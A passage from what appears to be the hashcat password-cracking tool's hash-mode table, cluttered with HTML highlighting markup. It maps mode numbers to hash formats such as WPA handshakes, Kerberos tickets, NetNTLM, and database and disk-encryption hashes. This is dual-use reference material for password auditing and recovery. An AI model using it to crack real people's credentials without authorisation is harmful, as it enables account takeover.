    120 | sha1&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                                | Raw Hash, Salted and/or Iterated
   4900 | sha1&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.&lt;span class="nv"&gt;$pass&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                          | Raw Hash, Salted and/or Iterated
   4520 | sha1&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.sha1&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;                          | Raw Hash, Salted and/or Iterated
    140 | sha1&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.utf16le&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;                       | Raw Hash, Salted and/or Iterated
  19300 | sha1&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt1&lt;/span&gt;.&lt;span class="nv"&gt;$pass&lt;/span&gt;.&lt;span class="nv"&gt;$salt2&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                        | Raw Hash, Salted and/or Iterated
  14400 | sha1&lt;span class="o"&gt;(&lt;/span&gt;CX&lt;span class="o"&gt;)&lt;/span&gt;                                         | Raw Hash, Salted and/or Iterated
   4700 | sha1&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;                                 | Raw Hash, Salted and/or Iterated
   4710 | sha1&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                           | Raw Hash, Salted and/or Iterated
  21100 | sha1&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;                           | Raw Hash, Salted and/or Iterated
  18500 | sha1&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)))&lt;/span&gt;                            | Raw Hash, Salted and/or Iterated
   4500 | sha1&lt;span class="o"&gt;(&lt;/span&gt;sha1&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;                                | Raw Hash, Salted and/or Iterated
    130 | sha1&lt;span class="o"&gt;(&lt;/span&gt;utf16le&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                       | Raw Hash, Salted and/or Iterated
   1410 | sha256&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                              | Raw Hash, Salted and/or Iterated
   1420 | sha256&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                              | Raw Hash, Salted and/or Iterated
  22300 | sha256&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.&lt;span class="nv"&gt;$pass&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                        | Raw Hash, Salted and/or Iterated
   1440 | sha256&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.utf16le&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;                     | Raw Hash, Salted and/or Iterated
  20800 | sha256&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;                               | Raw Hash, Salted and/or Iterated
  20710 | sha256&lt;span class="o"&gt;(&lt;/span&gt;sha256&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                      | Raw Hash, Salted and/or Iterated
   1430 | sha256&lt;span class="o"&gt;(&lt;/span&gt;utf16le&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                     | Raw Hash, Salted and/or Iterated
   1710 | sha512&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                              | Raw Hash, Salted and/or Iterated
   1720 | sha512&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                              | Raw Hash, Salted and/or Iterated
   1740 | sha512&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.utf16le&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;                     | Raw Hash, Salted and/or Iterated
   1730 | sha512&lt;span class="o"&gt;(&lt;/span&gt;utf16le&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                     | Raw Hash, Salted and/or Iterated
  19500 | Ruby on Rails Restful-Authentication             | Raw Hash, Salted and/or Iterated
     50 | HMAC-MD5 &lt;span class="o"&gt;(&lt;/span&gt;key &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                           | Raw Hash, Authenticated
     60 | HMAC-MD5 &lt;span class="o"&gt;(&lt;/span&gt;key &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                           | Raw Hash, Authenticated
    150 | HMAC-SHA1 &lt;span class="o"&gt;(&lt;/span&gt;key &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                          | Raw Hash, Authenticated
    160 | HMAC-SHA1 &lt;span class="o"&gt;(&lt;/span&gt;key &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                          | Raw Hash, Authenticated
   1450 | HMAC-SHA256 &lt;span class="o"&gt;(&lt;/span&gt;key &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                        | Raw Hash, Authenticated
   1460 | HMAC-SHA256 &lt;span class="o"&gt;(&lt;/span&gt;key &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                        | Raw Hash, Authenticated
   1750 | HMAC-SHA512 &lt;span class="o"&gt;(&lt;/span&gt;key &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                        | Raw Hash, Authenticated
   1760 | HMAC-SHA512 &lt;span class="o"&gt;(&lt;/span&gt;key &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                        | Raw Hash, Authenticated
  11750 | HMAC-Streebog-256 &lt;span class="o"&gt;(&lt;/span&gt;key &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;, big-endian      | Raw Hash, Authenticated
  11760 | HMAC-Streebog-256 &lt;span class="o"&gt;(&lt;/span&gt;key &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;, big-endian      | Raw Hash, Authenticated
  11850 | HMAC-Streebog-512 &lt;span class="o"&gt;(&lt;/span&gt;key &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;, big-endian      | Raw Hash, Authenticated
  11860 | HMAC-Streebog-512 &lt;span class="o"&gt;(&lt;/span&gt;key &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;, big-endian      | Raw Hash, Authenticated
  11500 | CRC32                                            | Raw Checksum
  14100 | 3DES &lt;span class="o"&gt;(&lt;/span&gt;PT &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$salt&lt;/span&gt;, key &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                   | Raw Cipher, Known-Plaintext attack
  14000 | DES &lt;span class="o"&gt;(&lt;/span&gt;PT &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$salt&lt;/span&gt;, key &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                    | Raw Cipher, Known-Plaintext attack
  15400 | ChaCha20                                         | Raw Cipher, Known-Plaintext attack
  14900 | Skip32 &lt;span class="o"&gt;(&lt;/span&gt;PT &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$salt&lt;/span&gt;, key &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                 | Raw Cipher, Known-Plaintext attack
  11900 | PBKDF2-HMAC-MD5                                  | Generic KDF
  12000 | PBKDF2-HMAC-SHA1                                 | Generic KDF
  10900 | PBKDF2-HMAC-SHA256                               | Generic KDF
  12100 | PBKDF2-HMAC-SHA512                               | Generic KDF
   8900 | scrypt                                           | Generic KDF
    400 | phpass                                           | Generic KDF
  16900 | Ansible Vault                                    | Generic KDF
  12001 | Atlassian &lt;span class="o"&gt;(&lt;/span&gt;PBKDF2-HMAC-SHA1&lt;span class="o"&gt;)&lt;/span&gt;                     | Generic KDF
  20200 | Python passlib pbkdf2-sha512                     | Generic KDF
  20300 | Python passlib pbkdf2-sha256                     | Generic KDF
  20400 | Python passlib pbkdf2-sha1                       | Generic KDF
  16100 | TACACS+                                          | Network Protocols
  11400 | SIP digest authentication &lt;span class="o"&gt;(&lt;/span&gt;MD5&lt;span class="o"&gt;)&lt;/span&gt;                  | Network Protocols
   5300 | IKE-PSK MD5                                      | Network Protocols
   5400 | IKE-PSK SHA1                                     | Network Protocols
  23200 | XMPP SCRAM PBKDF2-SHA1                           | Network Protocols
   2500 | WPA-EAPOL-PBKDF2                                 | Network Protocols
   2501 | WPA-EAPOL-PMK                                    | Network Protocols
  22000 | WPA-PBKDF2-PMKID+EAPOL                           | Network Protocols
  22001 | WPA-PMK-PMKID+EAPOL                              | Network Protocols
  16800 | WPA-PMKID-PBKDF2                                 | Network Protocols
  16801 | WPA-PMKID-PMK                                    | Network Protocols
   7300 | IPMI2 RAKP HMAC-SHA1                             | Network Protocols
  10200 | CRAM-MD5                                         | Network Protocols
   4800 | iSCSI CHAP authentication, MD5&lt;span class="o"&gt;(&lt;/span&gt;CHAP&lt;span class="o"&gt;)&lt;/span&gt;             | Network Protocols
  16500 | JWT &lt;span class="o"&gt;(&lt;/span&gt;JSON Web Token&lt;span class="o"&gt;)&lt;/span&gt;                             | Network Protocols
  22600 | Telegram Desktop App Passcode &lt;span class="o"&gt;(&lt;/span&gt;PBKDF2-HMAC-SHA1&lt;span class="o"&gt;)&lt;/span&gt; | Network Protocols
  22301 | Telegram Mobile App Passcode &lt;span class="o"&gt;(&lt;/span&gt;SHA256&lt;span class="o"&gt;)&lt;/span&gt;            | Network Protocols
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth            | Network Protocols
  13100 | Kerberos 5, etype 23, TGS-REP                    | Network Protocols
  18200 | Kerberos 5, etype 23, AS-REP                     | Network Protocols
  19600 | Kerberos 5, etype 17, TGS-REP                    | Network Protocols
  19700 | Kerberos 5, etype 18, TGS-REP                    | Network Protocols
  19800 | Kerberos 5, etype 17, Pre-Auth                   | Network Protocols
  19900 | Kerberos 5, etype 18, Pre-Auth                   | Network Protocols
   5500 | NetNTLMv1 / NetNTLMv1+ESS                        | Network Protocols
   5600 | NetNTLMv2                                        | Network Protocols
     23 | Skype                                            | Network Protocols
  11100 | PostgreSQL CRAM &lt;span class="o"&gt;(&lt;/span&gt;MD5&lt;span class="o"&gt;)&lt;/span&gt;                            | Network Protocols
  11200 | MySQL CRAM &lt;span class="o"&gt;(&lt;/span&gt;SHA1&lt;span class="o"&gt;)&lt;/span&gt;                                | Network Protocols
   8500 | RACF                                             | Operating System
   6300 | AIX &lt;span class="o"&gt;{&lt;/span&gt;smd5&lt;span class="o"&gt;}&lt;/span&gt;                                       | Operating System
   6700 | AIX &lt;span class="o"&gt;{&lt;/span&gt;ssha1&lt;span class="o"&gt;}&lt;/span&gt;                                      | Operating System
   6400 | AIX &lt;span class="o"&gt;{&lt;/span&gt;ssha256&lt;span class="o"&gt;}&lt;/span&gt;                                    | Operating System
   6500 | AIX &lt;span class="o"&gt;{&lt;/span&gt;ssha512&lt;span class="o"&gt;}&lt;/span&gt;                                    | Operating System
   3000 | LM                                               | Operating System
  19000 | QNX /etc/shadow &lt;span class="o"&gt;(&lt;/span&gt;MD5&lt;span class="o"&gt;)&lt;/span&gt;                            | Operating System
  19100 | QNX /etc/shadow &lt;span class="o"&gt;(&lt;/span&gt;SHA256&lt;span class="o"&gt;)&lt;/span&gt;                         | Operating System
  19200 | QNX /etc/shadow &lt;span class="o"&gt;(&lt;/span&gt;SHA512&lt;span class="o"&gt;)&lt;/span&gt;                         | Operating System
  15300 | DPAPI masterkey file v1                          | Operating System
  15900 | DPAPI masterkey file v2                          | Operating System
   7200 | GRUB 2                                           | Operating System
  12800 | MS-AzureSync PBKDF2-HMAC-SHA256                  | Operating System
  12400 | BSDi Crypt, Extended DES                         | Operating System
   1000 | NTLM                                             | Operating System
    122 | macOS v10.4, macOS v10.5, MacOS v10.6            | Operating System
   1722 | macOS v10.7                                      | Operating System
   7100 | macOS v10.8+ &lt;span class="o"&gt;(&lt;/span&gt;PBKDF2-SHA512&lt;span class="o"&gt;)&lt;/span&gt;                     | Operating System
   9900 | Radmin2                                          | Operating System
   5800 | Samsung Android Password/PIN                     | Operating System
   3200 | bcrypt &lt;span class="nv"&gt;$2&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="nv"&gt;$,&lt;/span&gt; Blowfish &lt;span class="o"&gt;(&lt;/span&gt;Unix&lt;span class="o"&gt;)&lt;/span&gt;                     | Operating System
    500 | md5crypt, MD5 &lt;span class="o"&gt;(&lt;/span&gt;Unix&lt;span class="o"&gt;)&lt;/span&gt;, Cisco-IOS &lt;span class="nv"&gt;$1$ &lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;MD5&lt;span class="o"&gt;)&lt;/span&gt;        | Operating System
   1500 | descrypt, DES &lt;span class="o"&gt;(&lt;/span&gt;Unix&lt;span class="o"&gt;)&lt;/span&gt;, Traditional DES            | Operating System
   7400 | sha256crypt &lt;span class="nv"&gt;$5$,&lt;/span&gt; SHA256 &lt;span class="o"&gt;(&lt;/span&gt;Unix&lt;span class="o"&gt;)&lt;/span&gt;                   | Operating System
   1800 | sha512crypt &lt;span class="nv"&gt;$6$,&lt;/span&gt; SHA512 &lt;span class="o"&gt;(&lt;/span&gt;Unix&lt;span class="o"&gt;)&lt;/span&gt;                   | Operating System
  13800 | Windows Phone 8+ PIN/password                    | Operating System
   2410 | Cisco-ASA MD5                                    | Operating System
   9200 | Cisco-IOS &lt;span class="nv"&gt;$8$ &lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;PBKDF2-SHA256&lt;span class="o"&gt;)&lt;/span&gt;                    | Operating System
   9300 | Cisco-IOS &lt;span class="nv"&gt;$9$ &lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;scrypt&lt;span class="o"&gt;)&lt;/span&gt;                           | Operating System
   5700 | Cisco-IOS &lt;span class="nb"&gt;type &lt;/span&gt;4 &lt;span class="o"&gt;(&lt;/span&gt;SHA256&lt;span class="o"&gt;)&lt;/span&gt;                        | Operating System
   2400 | Cisco-PIX MD5                                    | Operating System
   8100 | Citrix NetScaler &lt;span class="o"&gt;(&lt;/span&gt;SHA1&lt;span class="o"&gt;)&lt;/span&gt;                          | Operating System
  22200 | Citrix NetScaler &lt;span class="o"&gt;(&lt;/span&gt;SHA512&lt;span class="o"&gt;)&lt;/span&gt;                        | Operating System
   1100 | Domain Cached Credentials &lt;span class="o"&gt;(&lt;/span&gt;DCC&lt;span class="o"&gt;)&lt;/span&gt;, MS Cache        | Operating System
   2100 | Domain Cached Credentials 2 &lt;span class="o"&gt;(&lt;/span&gt;DCC2&lt;span class="o"&gt;)&lt;/span&gt;, MS Cache 2   | Operating System
   7000 | FortiGate &lt;span class="o"&gt;(&lt;/span&gt;FortiOS&lt;span class="o"&gt;)&lt;/span&gt;                              | Operating System
    125 | ArubaOS                                          | Operating System
    501 | Juniper IVE                                      | Operating System
     22 | Juniper NetScreen/SSG &lt;span class="o"&gt;(&lt;/span&gt;ScreenOS&lt;span class="o"&gt;)&lt;/span&gt;                 | Operating System
  15100 | Juniper/NetBSD sha1crypt                         | Operating System
    131 | MSSQL &lt;span class="o"&gt;(&lt;/span&gt;2000&lt;span class="o"&gt;)&lt;/span&gt;                                     | Database Server
    132 | MSSQL &lt;span class="o"&gt;(&lt;/span&gt;2005&lt;span class="o"&gt;)&lt;/span&gt;                                     | Database Server
   1731 | MSSQL &lt;span class="o"&gt;(&lt;/span&gt;2012, 2014&lt;span class="o"&gt;)&lt;/span&gt;                               | Database Server
     12 | PostgreSQL                                       | Database Server
   3100 | Oracle H: Type &lt;span class="o"&gt;(&lt;/span&gt;Oracle 7+&lt;span class="o"&gt;)&lt;/span&gt;                       | Database Server
    112 | Oracle S: Type &lt;span class="o"&gt;(&lt;/span&gt;Oracle 11+&lt;span class="o"&gt;)&lt;/span&gt;                      | Database Server
  12300 | Oracle T: Type &lt;span class="o"&gt;(&lt;/span&gt;Oracle 12+&lt;span class="o"&gt;)&lt;/span&gt;                      | Database Server
   7401 | MySQL &lt;span class="nv"&gt;$A$ &lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;sha256crypt&lt;span class="o"&gt;)&lt;/span&gt;                          | Database Server
    200 | MySQL323                                         | Database Server
    300 | MySQL4.1/MySQL5                                  | Database Server
   8000 | Sybase ASE                                       | Database Server
   1421 | hMailServer                                      | FTP, HTTP, SMTP, LDAP Server
   8300 | DNSSEC &lt;span class="o"&gt;(&lt;/span&gt;NSEC3&lt;span class="o"&gt;)&lt;/span&gt;                                   | FTP, HTTP, SMTP, LDAP Server
  16400 | CRAM-MD5 Dovecot                                 | FTP, HTTP, SMTP, LDAP Server
   1411 | SSHA-256&lt;span class="o"&gt;(&lt;/span&gt;Base64&lt;span class="o"&gt;)&lt;/span&gt;, LDAP &lt;span class="o"&gt;{&lt;/span&gt;SSHA256&lt;span class="o"&gt;}&lt;/span&gt;                 | FTP, HTTP, SMTP, LDAP Server
   1711 | SSHA-512&lt;span class="o"&gt;(&lt;/span&gt;Base64&lt;span class="o"&gt;)&lt;/span&gt;, LDAP &lt;span class="o"&gt;{&lt;/span&gt;SSHA512&lt;span class="o"&gt;}&lt;/span&gt;                 | FTP, HTTP, SMTP, LDAP Server
  10901 | RedHat 389-DS LDAP &lt;span class="o"&gt;(&lt;/span&gt;PBKDF2-HMAC-SHA256&lt;span class="o"&gt;)&lt;/span&gt;          | FTP, HTTP, SMTP, LDAP Server
  15000 | FileZilla Server &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; 0.9.55                       | FTP, HTTP, SMTP, LDAP Server
  12600 | ColdFusion 10+                                   | FTP, HTTP, SMTP, LDAP Server
   1600 | Apache &lt;span class="nv"&gt;$apr1$ &lt;/span&gt;MD5, md5apr1, MD5 &lt;span class="o"&gt;(&lt;/span&gt;APR&lt;span class="o"&gt;)&lt;/span&gt;            | FTP, HTTP, SMTP, LDAP Server
    141 | Episerver 6.x &amp;lt; .NET 4                           | FTP, HTTP, SMTP, LDAP Server
   1441 | Episerver 6.x &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; .NET 4                          | FTP, HTTP, SMTP, LDAP Server
    101 | nsldap, SHA-1&lt;span class="o"&gt;(&lt;/span&gt;Base64&lt;span class="o"&gt;)&lt;/span&gt;, Netscape LDAP SHA         | FTP, HTTP, SMTP, LDAP Server
    111 | nsldaps, SSHA-1&lt;span class="o"&gt;(&lt;/span&gt;Base64&lt;span class="o"&gt;)&lt;/span&gt;, Netscape LDAP SSHA      | FTP, HTTP, SMTP, LDAP Server
   7700 | SAP CODVN B &lt;span class="o"&gt;(&lt;/span&gt;BCODE&lt;span class="o"&gt;)&lt;/span&gt;                              | Enterprise Application Software &lt;span class="o"&gt;(&lt;/span&gt;EAS&lt;span class="o"&gt;)&lt;/span&gt;
   7701 | SAP CODVN B &lt;span class="o"&gt;(&lt;/span&gt;BCODE&lt;span class="o"&gt;)&lt;/span&gt; from RFC_READ_TABLE          | Enterprise Application Software &lt;span class="o"&gt;(&lt;/span&gt;EAS&lt;span class="o"&gt;)&lt;/span&gt;
   7800 | SAP CODVN F/G &lt;span class="o"&gt;(&lt;/span&gt;PASSCODE&lt;span class="o"&gt;)&lt;/span&gt;                         | Enterprise Application Software &lt;span class="o"&gt;(&lt;/span&gt;EAS&lt;span class="o"&gt;)&lt;/span&gt;
   7801 | SAP CODVN F/G &lt;span class="o"&gt;(&lt;/span&gt;PASSCODE&lt;span class="o"&gt;)&lt;/span&gt; from RFC_READ_TABLE     | Enterprise Application Software &lt;span class="o"&gt;(&lt;/span&gt;EAS&lt;span class="o"&gt;)&lt;/span&gt;
  10300 | SAP CODVN H &lt;span class="o"&gt;(&lt;/span&gt;PWDSALTEDHASH&lt;span class="o"&gt;)&lt;/span&gt; iSSHA-1              | Enterprise Application Software &lt;span class="o"&gt;(&lt;/span&gt;EAS&lt;span class="o"&gt;)&lt;/span&gt;
    133 | PeopleSoft                                       | Enterprise Application Software &lt;span class="o"&gt;(&lt;/span&gt;EAS&lt;span class="o"&gt;)&lt;/span&gt;
  13500 | PeopleSoft PS_TOKEN                              | Enterprise Application Software &lt;span class="o"&gt;(&lt;/span&gt;EAS&lt;span class="o"&gt;)&lt;/span&gt;
  21500 | SolarWinds Orion                                 | Enterprise Application Software &lt;span class="o"&gt;(&lt;/span&gt;EAS&lt;span class="o"&gt;)&lt;/span&gt;
   8600 | Lotus Notes/Domino 5                             | Enterprise Application Software &lt;span class="o"&gt;(&lt;/span&gt;EAS&lt;span class="o"&gt;)&lt;/span&gt;
   8700 | Lotus Notes/Domino 6                             | Enterprise Application Software &lt;span class="o"&gt;(&lt;/span&gt;EAS&lt;span class="o"&gt;)&lt;/span&gt;
   9100 | Lotus Notes/Domino 8                             | Enterprise Application Software &lt;span class="o"&gt;(&lt;/span&gt;EAS&lt;span class="o"&gt;)&lt;/span&gt;
  20600 | Oracle Transportation Management &lt;span class="o"&gt;(&lt;/span&gt;SHA256&lt;span class="o"&gt;)&lt;/span&gt;        | Enterprise Application Software &lt;span class="o"&gt;(&lt;/span&gt;EAS&lt;span class="o"&gt;)&lt;/span&gt;
   4711 | Huawei sha1&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                    | Enterprise Application Software &lt;span class="o"&gt;(&lt;/span&gt;EAS&lt;span class="o"&gt;)&lt;/span&gt;
  20711 | AuthMe sha256                                    | Enterprise Application Software &lt;span class="o"&gt;(&lt;/span&gt;EAS&lt;span class="o"&gt;)&lt;/span&gt;
  12200 | eCryptfs                                         | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  22400 | AES Crypt &lt;span class="o"&gt;(&lt;/span&gt;SHA256&lt;span class="o"&gt;)&lt;/span&gt;                               | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  14600 | LUKS                                             | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13711 | VeraCrypt RIPEMD160 + XTS 512 bit                | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13712 | VeraCrypt RIPEMD160 + XTS 1024 bit               | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13713 | VeraCrypt RIPEMD160 + XTS 1536 bit               | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13741 | VeraCrypt RIPEMD160 + XTS 512 bit + boot-mode    | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13742 | VeraCrypt RIPEMD160 + XTS 1024 bit + boot-mode   | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13743 | VeraCrypt RIPEMD160 + XTS 1536 bit + boot-mode   | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13751 | VeraCrypt SHA256 + XTS 512 bit                   | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13752 | VeraCrypt SHA256 + XTS 1024 bit                  | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13753 | VeraCrypt SHA256 + XTS 1536 bit                  | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13761 | VeraCrypt SHA256 + XTS 512 bit + boot-mode       | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13762 | VeraCrypt SHA256 + XTS 1024 bit + boot-mode      | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13763 | VeraCrypt SHA256 + XTS 1536 bit + boot-mode      | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13721 | VeraCrypt SHA512 + XTS 512 bit                   | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13722 | VeraCrypt SHA512 + XTS 1024 bit                  | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13723 | VeraCrypt SHA512 + XTS 1536 bit                  | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13771 | VeraCrypt Streebog-512 + XTS 512 bit             | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13772 | VeraCrypt Streebog-512 + XTS 1024 bit            | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
